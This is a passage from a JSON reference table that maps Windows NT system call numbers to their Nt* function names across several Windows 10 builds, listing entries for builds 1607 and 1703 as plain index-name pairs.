"NtOpenTransaction", "287": "NtOpenTransactionManager", "288": "NtPlugPlayControl", "289": "NtPrePrepareComplete", "290": "NtPrePrepareEnlistment", "291": "NtPrepareComplete", "292": "NtPrepareEnlistment", "293": "NtPrivilegeCheck", "294": "NtPrivilegeObjectAuditAlarm", "295": "NtPrivilegedServiceAuditAlarm", "296": "NtPropagationComplete", "297": "NtPropagationFailed", "298": "NtPulseEvent", "299": "NtQueryBootEntryOrder", "300": "NtQueryBootOptions", "301": "NtQueryDebugFilterState", "302": "NtQueryDirectoryObject", "303": "NtQueryDriverEntryOrder", "304": "NtQueryEaFile", "305": "NtQueryFullAttributesFile", "306": "NtQueryInformationAtom", "307": "NtQueryInformationEnlistment", "308": "NtQueryInformationJobObject", "309": "NtQueryInformationPort", "310": "NtQueryInformationResourceManager", "311": "NtQueryInformationTransaction", "312": "NtQueryInformationTransactionManager", "313": "NtQueryInformationWorkerFactory", "314": "NtQueryInstallUILanguage", "315": "NtQueryIntervalProfile", "316": "NtQueryIoCompletion", "317": "NtQueryLicenseValue", "318": "NtQueryMultipleValueKey", "319": "NtQueryMutant", "320": "NtQueryOpenSubKeys", "321": "NtQueryOpenSubKeysEx", "322": "NtQueryPortInformationProcess", "323": "NtQueryQuotaInformationFile", "324": "NtQuerySecurityAttributesToken", "325": "NtQuerySecurityObject", "326": "NtQuerySemaphore", "327": "NtQuerySymbolicLinkObject", "328": "NtQuerySystemEnvironmentValue", "329": "NtQuerySystemEnvironmentValueEx", "330": "NtQuerySystemInformationEx", "331": "NtQueryTimerResolution", "332": "NtQueryWnfStateData", "333": "NtQueryWnfStateNameInformation", "334": "NtQueueApcThreadEx", "335": "NtRaiseException", "336": "NtRaiseHardError", "337": "NtReadOnlyEnlistment", "338": "NtRecoverEnlistment", "339": "NtRecoverResourceManager", "340": "NtRecoverTransactionManager", "341": "NtRegisterProtocolAddressInformation", "342": "NtRegisterThreadTerminatePort", "343": "NtReleaseKeyedEvent", "344": "NtReleaseWorkerFactoryWorker", "345": "NtRemoveIoCompletionEx", "346": "NtRemoveProcessDebug", "347": "NtRenameKey", "348": "NtRenameTransactionManager", "349": "NtReplaceKey", "350": "NtReplacePartitionUnit", "351": "NtReplyWaitReplyPort", "352": "NtRequestPort", "353": "NtResetEvent", "354": "NtResetWriteWatch", "355": "NtRestoreKey", "356": "NtResumeProcess", "357": "NtRevertContainerImpersonation", "358": "NtRollbackComplete", "359": "NtRollbackEnlistment", "360": "NtRollbackTransaction", "361": "NtRollforwardTransactionManager", "362": "NtSaveKey", "363": "NtSaveKeyEx", "364": "NtSaveMergedKeys", "365": "NtSecureConnectPort", "366": "NtSerializeBoot", "367": "NtSetBootEntryOrder", "368": "NtSetBootOptions", "369": "NtSetCachedSigningLevel", "370": "NtSetContextThread", "371": "NtSetDebugFilterState", "372": "NtSetDefaultHardErrorPort", "373": "NtSetDefaultLocale", "374": "NtSetDefaultUILanguage", "375": "NtSetDriverEntryOrder", "376": "NtSetEaFile", "377": "NtSetHighEventPair", "378": "NtSetHighWaitLowEventPair", "379": "NtSetIRTimer", "380": "NtSetInformationDebugObject", "381": "NtSetInformationEnlistment", "382": "NtSetInformationJobObject", "383": "NtSetInformationKey", "384": "NtSetInformationResourceManager", "385": "NtSetInformationSymbolicLink", "386": "NtSetInformationToken", "387": "NtSetInformationTransaction", "388": "NtSetInformationTransactionManager", "389": "NtSetInformationVirtualMemory", "390": "NtSetInformationWorkerFactory", "391": "NtSetIntervalProfile", "392": "NtSetIoCompletion", "393": "NtSetIoCompletionEx", "394": "NtSetLdtEntries", "395": "NtSetLowEventPair", "396": "NtSetLowWaitHighEventPair", "397": "NtSetQuotaInformationFile", "398": "NtSetSecurityObject", "399": "NtSetSystemEnvironmentValue", "400": "NtSetSystemEnvironmentValueEx", "401": "NtSetSystemInformation", "402": "NtSetSystemPowerState", "403": "NtSetSystemTime", "404": "NtSetThreadExecutionState", "405": "NtSetTimer2", "406": "NtSetTimerEx", "407": "NtSetTimerResolution", "408": "NtSetUuidSeed", "409": "NtSetVolumeInformationFile", "410": "NtSetWnfProcessNotificationEvent", "411": "NtShutdownSystem", "412": "NtShutdownWorkerFactory", "413": "NtSignalAndWaitForSingleObject", "414": "NtSinglePhaseReject", "415": "NtStartProfile", "416": "NtStopProfile", "417": "NtSubscribeWnfStateChange", "418": "NtSuspendProcess", "419": "NtSuspendThread", "420": "NtSystemDebugControl", "421": "NtTerminateJobObject", "422": "NtTestAlert", "423": "NtThawRegistry", "424": "NtThawTransactions", "425": "NtTraceControl", "426": "NtTranslateFilePath", "427": "NtUmsThreadYield", "428": "NtUnloadDriver", "429": "NtUnloadKey", "430": "NtUnloadKey2", "431": "NtUnloadKeyEx", "432": "NtUnlockFile", "433": "NtUnlockVirtualMemory", "434": "NtUnmapViewOfSectionEx", "435": "NtUnsubscribeWnfStateChange", "436": "NtUpdateWnfStateData", "437": "NtVdmControl", "438": "NtWaitForAlertByThreadId", "439": "NtWaitForDebugEvent", "440": "NtWaitForKeyedEvent", "441": "NtWaitForWorkViaWorkerFactory", "442": "NtWaitHighEventPair", "443": "NtWaitLowEventPair"}, "1607": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAddAtomEx", "104": "NtAddBootEntry", "105": "NtAddDriverEntry", "106": "NtAdjustGroupsToken", "107": "NtAdjustTokenClaimsAndDeviceGroups", "108": "NtAlertResumeThread", "109": "NtAlertThread", "110": "NtAlertThreadByThreadId", "111": "NtAllocateLocallyUniqueId", "112": "NtAllocateReserveObject", "113": "NtAllocateUserPhysicalPages", "114": "NtAllocateUuids", "115": "NtAlpcAcceptConnectPort", "116": "NtAlpcCancelMessage", "117": "NtAlpcConnectPort", "118": "NtAlpcConnectPortEx", "119": "NtAlpcCreatePort", "120": "NtAlpcCreatePortSection", "121": "NtAlpcCreateResourceReserve", "122": "NtAlpcCreateSectionView", "123": "NtAlpcCreateSecurityContext", "124": "NtAlpcDeletePortSection", "125": "NtAlpcDeleteResourceReserve", "126": "NtAlpcDeleteSectionView", "127": "NtAlpcDeleteSecurityContext", "128": "NtAlpcDisconnectPort", "129": "NtAlpcImpersonateClientContainerOfPort", "130": "NtAlpcImpersonateClientOfPort", "131": "NtAlpcOpenSenderProcess", "132": "NtAlpcOpenSenderThread", "133": "NtAlpcQueryInformation", "134": "NtAlpcQueryInformationMessage", "135": "NtAlpcRevokeSecurityContext", "136": "NtAlpcSendWaitReceivePort", "137": "NtAlpcSetInformation", "138": "NtAreMappedFilesTheSame", "139": "NtAssignProcessToJobObject", "140": "NtAssociateWaitCompletionPacket", "141": "NtCancelIoFileEx", "142": "NtCancelSynchronousIoFile", "143": "NtCancelTimer2", "144": "NtCancelWaitCompletionPacket", "145": "NtCommitComplete", "146": "NtCommitEnlistment", "147": "NtCommitRegistryTransaction", "148": "NtCommitTransaction", "149": "NtCompactKeys", "150": "NtCompareObjects", "151": "NtCompareTokens", "152": "NtCompleteConnectPort", "153": "NtCompressKey", "154": "NtConnectPort", "155": "NtCreateDebugObject", "156": "NtCreateDirectoryObject", "157": "NtCreateDirectoryObjectEx", "158": "NtCreateEnclave", "159": "NtCreateEnlistment", "160": "NtCreateEventPair", "161": "NtCreateIRTimer", "162": "NtCreateIoCompletion", "163": "NtCreateJobObject", "164": "NtCreateJobSet", "165": "NtCreateKeyTransacted", "166": "NtCreateKeyedEvent", "167": "NtCreateLowBoxToken", "168": "NtCreateMailslotFile", "169": "NtCreateMutant", "170": "NtCreateNamedPipeFile", "171": "NtCreatePagingFile", "172": "NtCreatePartition", "173": "NtCreatePort", "174": "NtCreatePrivateNamespace", "175": "NtCreateProcess", "176": "NtCreateProfile", "177": "NtCreateProfileEx", "178": "NtCreateRegistryTransaction", "179": "NtCreateResourceManager", "180": "NtCreateSemaphore", "181": "NtCreateSymbolicLinkObject", "182": "NtCreateThreadEx", "183": "NtCreateTimer", "184": "NtCreateTimer2", "185": "NtCreateToken", "186": "NtCreateTokenEx", "187": "NtCreateTransaction", "188": "NtCreateTransactionManager", "189": "NtCreateUserProcess", "190": "NtCreateWaitCompletionPacket", "191": "NtCreateWaitablePort", "192": "NtCreateWnfStateName", "193": "NtCreateWorkerFactory", "194": "NtDebugActiveProcess", "195": "NtDebugContinue", "196": "NtDeleteAtom", "197": "NtDeleteBootEntry", "198": "NtDeleteDriverEntry", "199": "NtDeleteFile", "200": "NtDeleteKey", "201": "NtDeleteObjectAuditAlarm", "202": "NtDeletePrivateNamespace", "203": "NtDeleteValueKey", "204": "NtDeleteWnfStateData", "205": "NtDeleteWnfStateName", "206": "NtDisableLastKnownGood", "207": "NtDisplayString", "208": "NtDrawText", "209": "NtEnableLastKnownGood", "210": "NtEnumerateBootEntries", "211": "NtEnumerateDriverEntries", "212": "NtEnumerateSystemEnvironmentValuesEx", "213": "NtEnumerateTransactionObject", "214": "NtExtendSection", "215": "NtFilterBootOption", "216": "NtFilterToken", "217": "NtFilterTokenEx", "218": "NtFlushBuffersFileEx", "219": "NtFlushInstallUILanguage", "220": "NtFlushInstructionCache", "221": "NtFlushKey", "222": "NtFlushProcessWriteBuffers", "223": "NtFlushVirtualMemory", "224": "NtFlushWriteBuffer", "225": "NtFreeUserPhysicalPages", "226": "NtFreezeRegistry", "227": "NtFreezeTransactions", "228": "NtGetCachedSigningLevel", "229": "NtGetCompleteWnfStateSubscription", "230": "NtGetContextThread", "231": "NtGetCurrentProcessorNumber", "232": "NtGetCurrentProcessorNumberEx", "233": "NtGetDevicePowerState", "234": "NtGetMUIRegistryInfo", "235": "NtGetNextProcess", "236": "NtGetNextThread", "237": "NtGetNlsSectionPtr", "238": "NtGetNotificationResourceManager", "239": "NtGetWriteWatch", "240": "NtImpersonateAnonymousToken", "241": "NtImpersonateThread", "242": "NtInitializeEnclave", "243": "NtInitializeNlsFiles", "244": "NtInitializeRegistry", "245": "NtInitiatePowerAction", "246": "NtIsSystemResumeAutomatic", "247": "NtIsUILanguageComitted", "248": "NtListenPort", "249": "NtLoadDriver", "250": "NtLoadEnclaveData", "251": "NtLoadKey", "252": "NtLoadKey2", "253": "NtLoadKeyEx", "254": "NtLockFile", "255": "NtLockProductActivationKeys", "256": "NtLockRegistryKey", "257": "NtLockVirtualMemory", "258": "NtMakePermanentObject", "259": "NtMakeTemporaryObject", "260": "NtManagePartition", "261": "NtMapCMFModule", "262": "NtMapUserPhysicalPages", "263": "NtModifyBootEntry", "264": "NtModifyDriverEntry", "265": "NtNotifyChangeDirectoryFile", "266": "NtNotifyChangeKey", "267": "NtNotifyChangeMultipleKeys", "268": "NtNotifyChangeSession", "269": "NtOpenEnlistment", "270": "NtOpenEventPair", "271": "NtOpenIoCompletion", "272": "NtOpenJobObject", "273": "NtOpenKeyEx", "274": "NtOpenKeyTransacted", "275": "NtOpenKeyTransactedEx", "276": "NtOpenKeyedEvent", "277": "NtOpenMutant", "278": "NtOpenObjectAuditAlarm", "279": "NtOpenPartition", "280": "NtOpenPrivateNamespace", "281": "NtOpenProcessToken", "282": "NtOpenRegistryTransaction", "283": "NtOpenResourceManager", "284": "NtOpenSemaphore", "285": "NtOpenSession", "286": "NtOpenSymbolicLinkObject", "287": "NtOpenThread", "288": "NtOpenTimer", "289": "NtOpenTransaction", "290": "NtOpenTransactionManager", "291": "NtPlugPlayControl", "292": "NtPrePrepareComplete", "293": "NtPrePrepareEnlistment", "294": "NtPrepareComplete", "295": "NtPrepareEnlistment", "296": "NtPrivilegeCheck", "297": "NtPrivilegeObjectAuditAlarm", "298": "NtPrivilegedServiceAuditAlarm", "299": "NtPropagationComplete", "300": "NtPropagationFailed", "301": "NtPulseEvent", "302": "NtQueryBootEntryOrder", "303": "NtQueryBootOptions", "304": "NtQueryDebugFilterState", "305": "NtQueryDirectoryObject", "306": "NtQueryDriverEntryOrder", "307": "NtQueryEaFile", "308": "NtQueryFullAttributesFile", "309": "NtQueryInformationAtom", "310": "NtQueryInformationEnlistment", "311": "NtQueryInformationJobObject", "312": "NtQueryInformationPort", "313": "NtQueryInformationResourceManager", "314": "NtQueryInformationTransaction", "315": "NtQueryInformationTransactionManager", "316": "NtQueryInformationWorkerFactory", "317": "NtQueryInstallUILanguage", "318": "NtQueryIntervalProfile", "319": "NtQueryIoCompletion", "320": "NtQueryLicenseValue", "321": "NtQueryMultipleValueKey", "322": "NtQueryMutant", "323": "NtQueryOpenSubKeys", "324": "NtQueryOpenSubKeysEx", "325": "NtQueryPortInformationProcess", "326": "NtQueryQuotaInformationFile", "327": "NtQuerySecurityAttributesToken", "328": "NtQuerySecurityObject", "329": "NtQuerySecurityPolicy", "330": "NtQuerySemaphore", "331": "NtQuerySymbolicLinkObject", "332": "NtQuerySystemEnvironmentValue", "333": "NtQuerySystemEnvironmentValueEx", "334": "NtQuerySystemInformationEx", "335": "NtQueryTimerResolution", "336": "NtQueryWnfStateData", "337": "NtQueryWnfStateNameInformation", "338": "NtQueueApcThreadEx", "339": "NtRaiseException", "340": "NtRaiseHardError", "341": "NtReadOnlyEnlistment", "342": "NtRecoverEnlistment", "343": "NtRecoverResourceManager", "344": "NtRecoverTransactionManager", "345": "NtRegisterProtocolAddressInformation", "346": "NtRegisterThreadTerminatePort", "347": "NtReleaseKeyedEvent", "348": "NtReleaseWorkerFactoryWorker", "349": "NtRemoveIoCompletionEx", "350": "NtRemoveProcessDebug", "351": "NtRenameKey", "352": "NtRenameTransactionManager", "353": "NtReplaceKey", "354": "NtReplacePartitionUnit", "355": "NtReplyWaitReplyPort", "356": "NtRequestPort", "357": "NtResetEvent", "358": "NtResetWriteWatch", "359": "NtRestoreKey", "360": "NtResumeProcess", "361": "NtRevertContainerImpersonation", "362": "NtRollbackComplete", "363": "NtRollbackEnlistment", "364": "NtRollbackRegistryTransaction", "365": "NtRollbackTransaction", "366": "NtRollforwardTransactionManager", "367": "NtSaveKey", "368": "NtSaveKeyEx", "369": "NtSaveMergedKeys", "370": "NtSecureConnectPort", "371": "NtSerializeBoot", "372": "NtSetBootEntryOrder", "373": "NtSetBootOptions", "374": "NtSetCachedSigningLevel", "375": "NtSetCachedSigningLevel2", "376": "NtSetContextThread", "377": "NtSetDebugFilterState", "378": "NtSetDefaultHardErrorPort", "379": "NtSetDefaultLocale", "380": "NtSetDefaultUILanguage", "381": "NtSetDriverEntryOrder", "382": "NtSetEaFile", "383": "NtSetHighEventPair", "384": "NtSetHighWaitLowEventPair", "385": "NtSetIRTimer", "386": "NtSetInformationDebugObject", "387": "NtSetInformationEnlistment", "388": "NtSetInformationJobObject", "389": "NtSetInformationKey", "390": "NtSetInformationResourceManager", "391": "NtSetInformationSymbolicLink", "392": "NtSetInformationToken", "393": "NtSetInformationTransaction", "394": "NtSetInformationTransactionManager", "395": "NtSetInformationVirtualMemory", "396": "NtSetInformationWorkerFactory", "397": "NtSetIntervalProfile", "398": "NtSetIoCompletion", "399": "NtSetIoCompletionEx", "400": "NtSetLdtEntries", "401": "NtSetLowEventPair", "402": "NtSetLowWaitHighEventPair", "403": "NtSetQuotaInformationFile", "404": "NtSetSecurityObject", "405": "NtSetSystemEnvironmentValue", "406": "NtSetSystemEnvironmentValueEx", "407": "NtSetSystemInformation", "408": "NtSetSystemPowerState", "409": "NtSetSystemTime", "410": "NtSetThreadExecutionState", "411": "NtSetTimer2", "412": "NtSetTimerEx", "413": "NtSetTimerResolution", "414": "NtSetUuidSeed", "415": "NtSetVolumeInformationFile", "416": "NtSetWnfProcessNotificationEvent", "417": "NtShutdownSystem", "418": "NtShutdownWorkerFactory", "419": "NtSignalAndWaitForSingleObject", "420": "NtSinglePhaseReject", "421": "NtStartProfile", "422": "NtStopProfile", "423": "NtSubscribeWnfStateChange", "424": "NtSuspendProcess", "425": "NtSuspendThread", "426": "NtSystemDebugControl", "427": "NtTerminateJobObject", "428": "NtTestAlert", "429": "NtThawRegistry", "430": "NtThawTransactions", "431": "NtTraceControl", "432": "NtTranslateFilePath", "433": "NtUmsThreadYield", "434": "NtUnloadDriver", "435": "NtUnloadKey", "436": "NtUnloadKey2", "437": "NtUnloadKeyEx", "438": "NtUnlockFile", "439": "NtUnlockVirtualMemory", "440": "NtUnmapViewOfSectionEx", "441": "NtUnsubscribeWnfStateChange", "442": "NtUpdateWnfStateData", "443": "NtVdmControl", "444": "NtWaitForAlertByThreadId", "445": "NtWaitForDebugEvent", "446": "NtWaitForKeyedEvent", "447": "NtWaitForWorkViaWorkerFactory", "448": "NtWaitHighEventPair", "449": "NtWaitLowEventPair"}, "1703": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireProcessActivityReference", "104": "NtAddAtomEx", "105": "NtAddBootEntry", "106": "NtAddDriverEntry", "107": "NtAdjustGroupsToken", "108": "NtAdjustTokenClaimsAndDeviceGroups", "109": "NtAlertResumeThread", "110": "NtAlertThread", "111": "NtAlertThreadByThreadId", "112": "NtAllocateLocallyUniqueId", "113": "NtAllocateReserveObject", "114": "NtAllocateUserPhysicalPages", "115": "NtAllocateUuids", "116": "NtAlpcAcceptConnectPort", "117": "NtAlpcCancelMessage", "118": "NtAlpcConnectPort", "119": "NtAlpcConnectPortEx", "120": "NtAlpcCreatePort", "121": "NtAlpcCreatePortSection", "122": "NtAlpcCreateResourceReserve", "123": "NtAlpcCreateSectionView", "124": "NtAlpcCreateSecurityContext", "125": "NtAlpcDeletePortSection", "126": "NtAlpcDeleteResourceReserve", "127": "NtAlpcDeleteSectionView", "128": "NtAlpcDeleteSecurityContext", "129": "NtAlpcDisconnectPort", "130": "NtAlpcImpersonateClientContainerOfPort", "131": "NtAlpcImpersonateClientOfPort", "132": "NtAlpcOpenSenderProcess", "133": "NtAlpcOpenSenderThread", "134": "NtAlpcQueryInformation", "135": "NtAlpcQueryInformationMessage", "136": "NtAlpcRevokeSecurityContext", "137": "NtAlpcSendWaitReceivePort", "138": "NtAlpcSetInformation", "139": "NtAreMappedFilesTheSame", "140": "NtAssignProcessToJobObject", "141": "NtAssociateWaitCompletionPacket", "142": "NtCancelIoFileEx", "143": "NtCancelSynchronousIoFile", "144": "NtCancelTimer2", "145": "NtCancelWaitCompletionPacket", "146": "NtCommitComplete", "147": "NtCommitEnlistment", "148": "NtCommitRegistryTransaction", "149": "NtCommitTransaction", "150": "NtCompactKeys", "151": "NtCompareObjects", "152": "NtCompareSigningLevels", "153": "NtCompareTokens", "154": "NtCompleteConnectPort", "155": "NtCompressKey", "156": "NtConnectPort", "157": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "158": "NtCreateDebugObject", "159": "NtCreateDirectoryObject", "160": "NtCreateDirectoryObjectEx", "161": "NtCreateEnclave", "162": "NtCreateEnlistment", "163": "NtCreateEventPair", "164": "NtCreateIRTimer", "165": "NtCreateIoCompletion", "166": "NtCreateJobObject", "167": "NtCreateJobSet", "168": "NtCreateKeyTransacted", "169": "NtCreateKeyedEvent", "170": "NtCreateLowBoxToken", "171": "NtCreateMailslotFile", "172": "NtCreateMutant", "173": "NtCreateNamedPipeFile", "174": "NtCreatePagingFile", "175": "NtCreatePartition", "176": "NtCreatePort", "177": "NtCreatePrivateNamespace", "178": "NtCreateProcess", "179": "NtCreateProfile", "180": "NtCreateProfileEx", "181": "NtCreateRegistryTransaction", "182": "NtCreateResourceManager", "183": "NtCreateSemaphore", "184": "NtCreateSymbolicLinkObject", "185": "NtCreateThreadEx", "186": "NtCreateTimer", "187": "NtCreateTimer2", "188": "NtCreateToken", "189": "NtCreateTokenEx", "190": "NtCreateTransaction", "191": "NtCreateTransactionManager", "192": "NtCreateUserProcess", "193": "NtCreateWaitCompletionPacket", "194": "NtCreateWaitablePort", "195": "NtCreateWnfStateName", "196": "NtCreateWorkerFactory", "197": "NtDebugActiveProcess", "198": "NtDebugContinue", "199": "NtDeleteAtom", "200": "NtDeleteBootEntry", "201": "NtDeleteDriverEntry", "202": "NtDeleteFile", "203": "NtDeleteKey", "204": "NtDeleteObjectAuditAlarm", "205": "NtDeletePrivateNamespace", "206": "NtDeleteValueKey", "207": "NtDeleteWnfStateData", "208": "NtDeleteWnfStateName", "209": "NtDisableLastKnownGood", "210": "NtDisplayString", "211": "NtDrawText", "212": "NtEnableLastKnownGood", "213": "NtEnumerateBootEntries", "214": "NtEnumerateDriverEntries", "215": "NtEnumerateSystemEnvironmentValuesEx", "216": "NtEnumerateTransactionObject", "217": "NtExtendSection", "218": "NtFilterBootOption", "219": "NtFilterToken", "220": "NtFilterTokenEx", "221": "NtFlushBuffersFileEx", "222": "NtFlushInstallUILanguage", "223": "NtFlushInstructionCache", "224": "NtFlushKey", "225": "NtFlushProcessWriteBuffers", "226": "NtFlushVirtualMemory", "227": "NtFlushWriteBuffer", "228": "NtFreeUserPhysicalPages", "229": "NtFreezeRegistry", "230": "NtFreezeTransactions", "231": "NtGetCachedSigningLevel", "232": "NtGetCompleteWnfStateSubscription", "233": "NtGetContextThread", "234": "NtGetCurrentProcessorNumber", "235": "NtGetCurrentProcessorNumberEx", "236": "NtGetDevicePowerState", "237": "NtGetMUIRegistryInfo", "238": "NtGetNextProcess", "239": "NtGetNextThread", "240": "NtGetNlsSectionPtr", "241": "NtGetNotificationResourceManager", "242": "NtGetWriteWatch", "243": "NtImpersonateAnonymousToken", "244": "NtImpersonateThread", "245": "NtInitializeEnclave", "246": "NtInitializeNlsFiles", "247": "NtInitializeRegistry", "248": "NtInitiatePowerAction", "249": "NtIsSystemResumeAutomatic", "250": "NtIsUILanguageComitted", "251": "NtListenPort", "252": "NtLoadDriver", "253": "NtLoadEnclaveData", "254": "NtLoadHotPatch", "255": "NtLoadKey", "256": "NtLoadKey2", "257": "NtLoadKeyEx", "258": "NtLockFile", "259": "NtLockProductActivationKeys", "260": "NtLockRegistryKey", "261": "NtLockVirtualMemory", "262": "NtMakePermanentObject", "263": "NtMakeTemporaryObject", "264": "NtManagePartition", "265": "NtMapCMFModule", "266": "NtMapUserPhysicalPages", "267": "NtModifyBootEntry", "268": "NtModifyDriverEntry", "269": "NtNotifyChangeDirectoryFile", "270": "NtNotifyChangeKey", "271": "NtNotifyChangeMultipleKeys", "272": "NtNotifyChangeSession", "273": "NtOpenEnlistment", "274": "NtOpenEventPair", "275": "NtOpenIoCompletion", "276": "NtOpenJobObject", "277": "NtOpenKeyEx", "278": "NtOpenKeyTransacted", "279": "NtOpenKeyTransactedEx", "280": "NtOpenKeyedEvent", "281": "NtOpenMutant", "282": "NtOpenObjectAuditAlarm", "283": "NtOpenPartition", "284": "NtOpenPrivateNamespace", "285": "NtOpenProcessToken", "286": "NtOpenRegistryTransaction", "287": "NtOpenResourceManager", "288": "NtOpenSemaphore", "289": "NtOpenSession", "290": "NtOpenSymbolicLinkObject", "291": "NtOpenThread", "292": "NtOpenTimer", "293": "NtOpenTransaction", "294": "NtOpenTransactionManager", "295": "NtPlugPlayControl", "296": "NtPrePrepareComplete", "297": "NtPrePrepareEnlistment", "298": "NtPrepareComplete", "299": "NtPrepareEnlistment", "300": "NtPrivilegeCheck", "301": "NtPrivilegeObjectAuditAlarm", "302": "NtPrivilegedServiceAuditAlarm", "303": "NtPropagationComplete", "304": "NtPropagationFailed", "305": "NtPulseEvent", "306": "NtQueryAuxiliaryCounterFrequency", "307": "NtQueryBootEntryOrder", "308": "NtQueryBootOptions", "309": "NtQueryDebugFilterState", "310": "NtQueryDirectoryObject", "311": "NtQueryDriverEntryOrder", "312": "NtQueryEaFile", "313": "NtQueryFullAttributesFile", "314": "NtQueryInformationAtom", "315": "NtQueryInformationByName", "316": "NtQueryInformationEnlistment", "317": "NtQueryInformationJobObject", "318": "NtQueryInformationPort", "319": 